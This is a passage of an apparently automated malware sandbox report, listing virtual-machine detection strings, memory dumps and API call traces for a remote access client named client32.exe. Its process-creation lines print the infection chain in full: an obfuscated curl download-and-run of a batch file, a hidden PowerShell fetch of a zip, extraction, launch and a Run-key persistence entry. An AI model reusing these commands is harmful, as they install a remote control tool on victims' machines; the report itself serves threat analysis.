                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorsys
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB182000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root PartitionPt
                                  Source: explorer.exe, 00000016.00000000.1609515483.0000000008970000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}UE
                                  Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll./
                                  Source: explorer.exe, 00000016.00000000.1609515483.0000000008970000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: explorer.exe, 00000016.00000002.2412632825.0000000000A76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processord-
                                  Source: explorer.exe, 00000016.00000003.2250792493.0000000006ED5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
                                  Source: chrome.exe, 00000000.00000002.2487145456.000028EC03B10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V rytllcpqlndyltx Bus
                                  Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
                                  Source: chrome.exe, 00000000.00000003.2329710109.000028EC0418C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HNsDotBanji+zdJtdJWwVU0t1V1g2kDmSj0io35uZI2mJ10slJHsVQ72JllxjR52IzdN5Axm1GFeXDjIK3wNCCjwcm2LDVq6C3yOR+yhCeHosbUjruKswWqC5ojMy2IybHYnXygsBRLP26oO1tBGFy3xAhROaJuyYjsFN3iufLlsDWF45ucQgYHjmUkQ5zk0tcmRZtVGsualaYi+7JnOyLrt4H4fIy7LWJXx6B9CwDbDn9FogxkhW8Cl384VhSKkh/e2aFQf94GcKsMxHAuRZweGa2w0hXYyg4saXqLeAKFKIO8Nwl+IiTQ5sE9vQ2vhrVuXq2gHtLBZ9DiEuRF0CmRS7KyWc0DJxABZPP6asyA0TCf80ZN7QJBjHRHdHQxPpqir4MZY4cEfJpupYM6LdKxam5JmiCnty/Pi9EViDu1YtN4MlyjHN3pYiMXdXJ4kcawGeCcJdcUrEquylguWek0X2cRTsv1nIKkEbkq5wfuKFl5cC8tSoeoCM+aCsF8JhjOsndtVXU3/yxyJFtRt2oqVqkut2cDMOoV6qTpqL8j8WjSoW+MKNu0ptJ49UBLBD7z91TBHEjJVPBTXPU1EgNK0OVXikwsPe+5cSech82LRaJ2d74d3RoLBW4JHWLmrrqvo+66Vm6/AVQNCNry1qQ3Y2UNEqkozv35OHQc8J7HUj5xjbzX5TjizXAgzBE5OT+RwQlNaD2IvBT3awR5wkY6rT3PF2fLNEMjnURCjdTu40YagXou4hnaGfOxdsr+FMK2ScXb8a+WfF+0MZq8D7MC2Tksh72hStAI0RKTT4PkqEDfUUbA+9jTaf71reuxFO75E+YxCtLpyGjSq5d2h15EC9JoNPlcX7HI1AFS3wJV80qZ28LSWU7ul+K7HbVCav2RKcfSPZMv+ZUQo4ieB+rhXGmMYBZq0hfnzzWDmhR5QxOnQ4yp8I29V2ZZR5W5UCQvtJXDdFGR3KDcLme1wAi7ECbZ971DTQGjcszsf2tiVFx/Q6F8eaC6sh7rfrYpdU6it8/7y1INKbGX+KlkdI6Ue/3Rlqz4f1UU7O7KOS21iczpfgptImVVHyWRnfA/TqsP3SSlP3rGaV+FQRpTN5V9XId0EUhJAzdDx/B2kM5T/Jp1P0peiCmOhczVBrjAGiwJsQ733IeJ1o/69ST5+W5smtorq2MPoLsa//xAGRmyOiwKTEdNmfIL9AiTRprFa/hZAEg3DghNFacPh0yl3S3Zu1dNTjkVJeU+9S4CouweyQKHXYhtZ02E0l2DTbM17d65XnIS/Frcjb5IsGdOLfYDKTsB22QpfGo5XgRnG32424WIdxbIqRA8T9Z1/UGQR7CV7VSVLTZ0jp2O+ljYdjixXTrsONB9W5X16HM0rEXkRah3JNHXMjMleuHz12pp/nYhP5IyPS+Id1C2j/wUh/D3+9pUdudzQ9gvSsKbf/cxwaxpCJ6CCZDu9xUV8PeSx3JmIr1otAblijc8gYtVU4h+KBttAOmS9IcOdSKL4tvqxGkW20xs2LoY1EW+01CeNYW2N1iqJfDCRLfC5UCLq+2iKpf+jnlCYWH7SmptnTC8TUPFuh3BijToq9FfEAcxEqYQ1qEhpci8gt9jvhigPs3ejVXrMTImMV5G1S0PzfPOZxbPe38EodnSTxSgE6pSlM32RXwLIEMZOX3VfVsub4gDgCTNeFzxFdZNqNmH0BdCFZG7JY+w1tFCZg7+C0Bk59JihfqRNMGMKjwm/MRgzXPsqHP40xTCsORuXbBKaHuD5FexKLD19RHJzFSlIvfJVa9wPq9ok/3UZH83O2Qmf7mREsk+fCVkB2+lOt2j7mu/XeWpXGRuzzsy/CxTg/mjPz8yTc4FDzSVVuTlTFszxAEqmetCU099Q1ezGmIUPwf3qTLw4SDtRmkRRZUAawYdySds/j+Ksn1rKZo04mUTwjj1LWpnPG0UMfwQSyPcBiHEU6x5aSFV6xMsnGg5K6ud1Pw/0yiE2LFZ5etwJUEdUHKml0is0Jp+X02lE28wBfkmGL4NK6eiE4KS7ngLHMsKpYKH0ePwGi77waBAx2xpbduFPMKHadtTCU4bxEyiFt2eSo4Di530SgDXCRdd6r6Q+4sSJaHwDPp0NnqB0wctMkd20NgUx2Y5E8jZAPQsJJd7ps7WpS6XVOflBFgKZ4twdc4USPsYinpAUmpeu+FHRpgw3pr2zx+zbfu3OWBb9XAtv9LdoBbGVGm+zuRWG0wfuaDwOM2rYHCpZ+VSLQiZ9D5bX3p2VMrnbgVKEoWkTWrk8fyZTrHYPBRUU8EDhy8lenDZgCZtDSJGoEBdAEFxDOYT7W0Cw2AR6H02PyDCsZ2VFnceeJ0fFcF5Hoj/QMQlrN27uj7H5QHmTsInWJHfccNk2UVK6ETXqx+fdfNSxrnavEgpatDDx1vMATx0pCTzdHAItQFwoJ4cX94Z1prk0k+HpyVm3aW08aZW+VdqhNN+vsWzPCPAZZiE+fIi5eBDITLPIqrb9t1Md7ubrDqYycWRQQEmUF3jfcGwlMekRkl4Nkl85RqJee2muJQiwEIH+CDK+CzCQ2lrnDQ+hqUEluKLkhMz/7hXiIJOEgIHJQr1dxUIlz91kJWh4Iul7davpjQd6IIt3Mnp2hR0rWDz8+ZWTQCQ13U1oC65XnbDZTswiB8vjvmkYT+8HoP9rS6/mSXC7IXx91zlvVDeDh5/4tPIhtV6Q82PUl0Fyip2ILK+/PPoDVwBOpchDpnju0DW2PsnB4LisW1WEZ7b9F7/ksGBLPhmHhXSvuEQsRLqA92KUS2+r0geo8whVNHZ+EX8kf7Art9UMoe80ec0yf0NprcvqXdzoDGw1Gzeg1YtYNHX3xcxZbamGgk5xOFGc6Qex03G7MvVG8jYjbrGBHp1x9oGHnpiTMFGBfIhxTopUNS2KcQ/8xpnypBymD/H0WS8s8jn8o0X35mivo8vtDTA95pr1nv3cNo78wP5ZSptCaYgADoG6o6h5Vwet
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
                                  Source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                  Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                  Source: chrome.exe, 00000000.00000003.1816401838.000028EC02578000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                                  Source: chrome.exe, 00000000.00000002.2496886639.000028EC04A69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HRpgw3pr2zx+zbfu3OWBb9XAtv9LdoBbGVGm+zuRWG0wfuaDwOM2rYHCpZ+VSLQiZ9D5bX3p2VMrnbgVKEoWkTWrk8fyZTrHYPBRUU8EDhy8lenDZgCZtDSJGoEBdAEFxDOYT7W0Cw2AR6H02PyDCsZ2VFnceeJ0fFcF5Hoj/QMQlrN27uj7H5QHmTsInWJHfccNk2UVK6ETXqx+fdfNSxrnavEgpatDDx1vMATx0pCTzdHAItQFwoJ4cX94Z1prk0k+HpyVm3aW08aZW+VdqhNN+vsWzPCPAZZiE+fIi5eBDITLPIqrb9t1Md7ubrDqYycWRQQEmUF3jfcGwlMekRkl4Nkl85RqJee2muJQiwEIH+CDK+CzCQ2lrnDQ+hqUEluKLkhMz/7hXiIJOEgIHJQr1dxUIlz91kJWh4Iul7davpjQd6IIt3Mnp2hR0rWDz8+ZWTQCQ13U1oC65XnbDZTswiB8vjvmkYT+8HoP9rS6/mSXC7IXx91zlvVDeDh5/4tPIhtV6Q82PUl0Fyip2ILK+/PPoDVwBOpchDpnju0DW2PsnB4LisW1WEZ7b9F7/ksGBLPhmHhXSvuEQsRLqA92KUS2+r0geo8whVNHZ+EX8kf7Art9UMoe80ec0yf0NprcvqXdzoDGw1Gzeg1YtYNHX3xcxZbamGgk5xOFGc6Qex03G7MvVG8jYjbrGBHp1x9oGHnpiTMFGBfIhxTopUNS2KcQ/8xpnypBymD/H0WS8s8jn8o0X35mivo8vtDTA95pr1nv3cNo78wP5ZSptCaYgADoG6o6h5Vwet6Pd/5nX/rH6XQg6m+h/O4unCB2pXHaxwj04cNjXCdcov4MMzMH7RgKKLn6ioKjztll35sUSyQaCW0hCYwgcFP1reCIB8x+p02ZSk66Kgk9yTZHb+SjgrPBwBSvp6O9TW0fhwfHHFu6ne6tKeE35QZfw0/Qsh8JNEBQZ9e9U7523ZknUEXDNab3atftuqwYudixqH6wUBDo1vTzxubK2wG+wvSldRddbcyoxLd651Sut6692sQsO6Ym59DVJG42S23BSF0sLYGKXMRsRc9rq9wpAmLb9P/k//ZBTB6Qd0plKhs3fekACyDEcikLaY9reD3c6DzT6L7O8FKTmNcxGhJ/9En4y6dRVdXUZw2JiFSikE9ruEQblbsveqBkNkLbh9/zKVTS6S7qy3CyNDSwvG8gkUoVn9Lfde0RhqMelaURaTIe0l9U4AP6SUWS4a4fUoL1sDcTd/OZbyGA\\u003d\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration ServiceS
                                  Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000}
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &Hyper-V HypervisorsY^
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorr.
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                                  Source: curl.exe, 0000001E.00000003.1778104266.000001366F8D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition*+h
                                  Source: explorer.exe, 00000016.00000000.1609515483.00000000086D5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
                                  Source: explorer.exe, 00000016.00000000.1609515483.00000000087E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                                  Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServiceA
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                                  Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: VMWare
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorc.sys
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.21805430.B64.230522183005/22/2023
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionll;
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionllEQ
                                  Source: explorer.exe, 00000016.00000000.1609515483.00000000087E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                                  Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=1292e4ad-0700-4406-abe9-f5f1f5a6abb7
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeAPI call chain: ExitProcess graph end nodegraph_37-94986
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeAPI call chain: ExitProcess graph end nodegraph_37-95343
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_11161D01
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,37_2_11147750
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11145440 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID,37_2_11145440
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1108BF30 GetTokenInformation,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,IsValidSid,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,37_2_1108BF30
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,37_2_11093080
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,37_2_110310C0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_11161D01
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_1116DD89
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCA28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_6CCA28E1
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCA87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_6CCA87F5
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,37_2_110F4560
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,37_2_1111FCA0
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press EnterJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press EnterJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Options\client32.exe "C:\Users\user\AppData\Roaming\Options\client32.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /fJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,37_2_1109E190
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,37_2_1109E910
                                  Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmpBinary or memory string: Program ManagerKO
                                  Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000002.2431995358.00000000043D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1602122423.00000000043D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                                  Source: explorer.exe, 00000016.00000003.2240395779.0000000008909000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1609515483.0000000008834000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndX
                                  Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, client32.exeBinary or memory string: Progman
                                  Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2412632825.00000000009AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
                                  Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmpBinary or memory string: Progmanlock
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,37_2_11173A35
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,37_2_11173D69
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,37_2_11173CC6
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoA,37_2_1116B38E
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,37_2_11173933
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,37_2_111739DA
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,37_2_1117383E
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,37_2_11173D2D
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,37_2_11173C06
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,37_2_6CCB0F39
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,37_2_6CCB2089
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,37_2_6CCB21DC
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: EnumSystemLocalesA,37_2_6CCB2151
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,37_2_6CCB2175
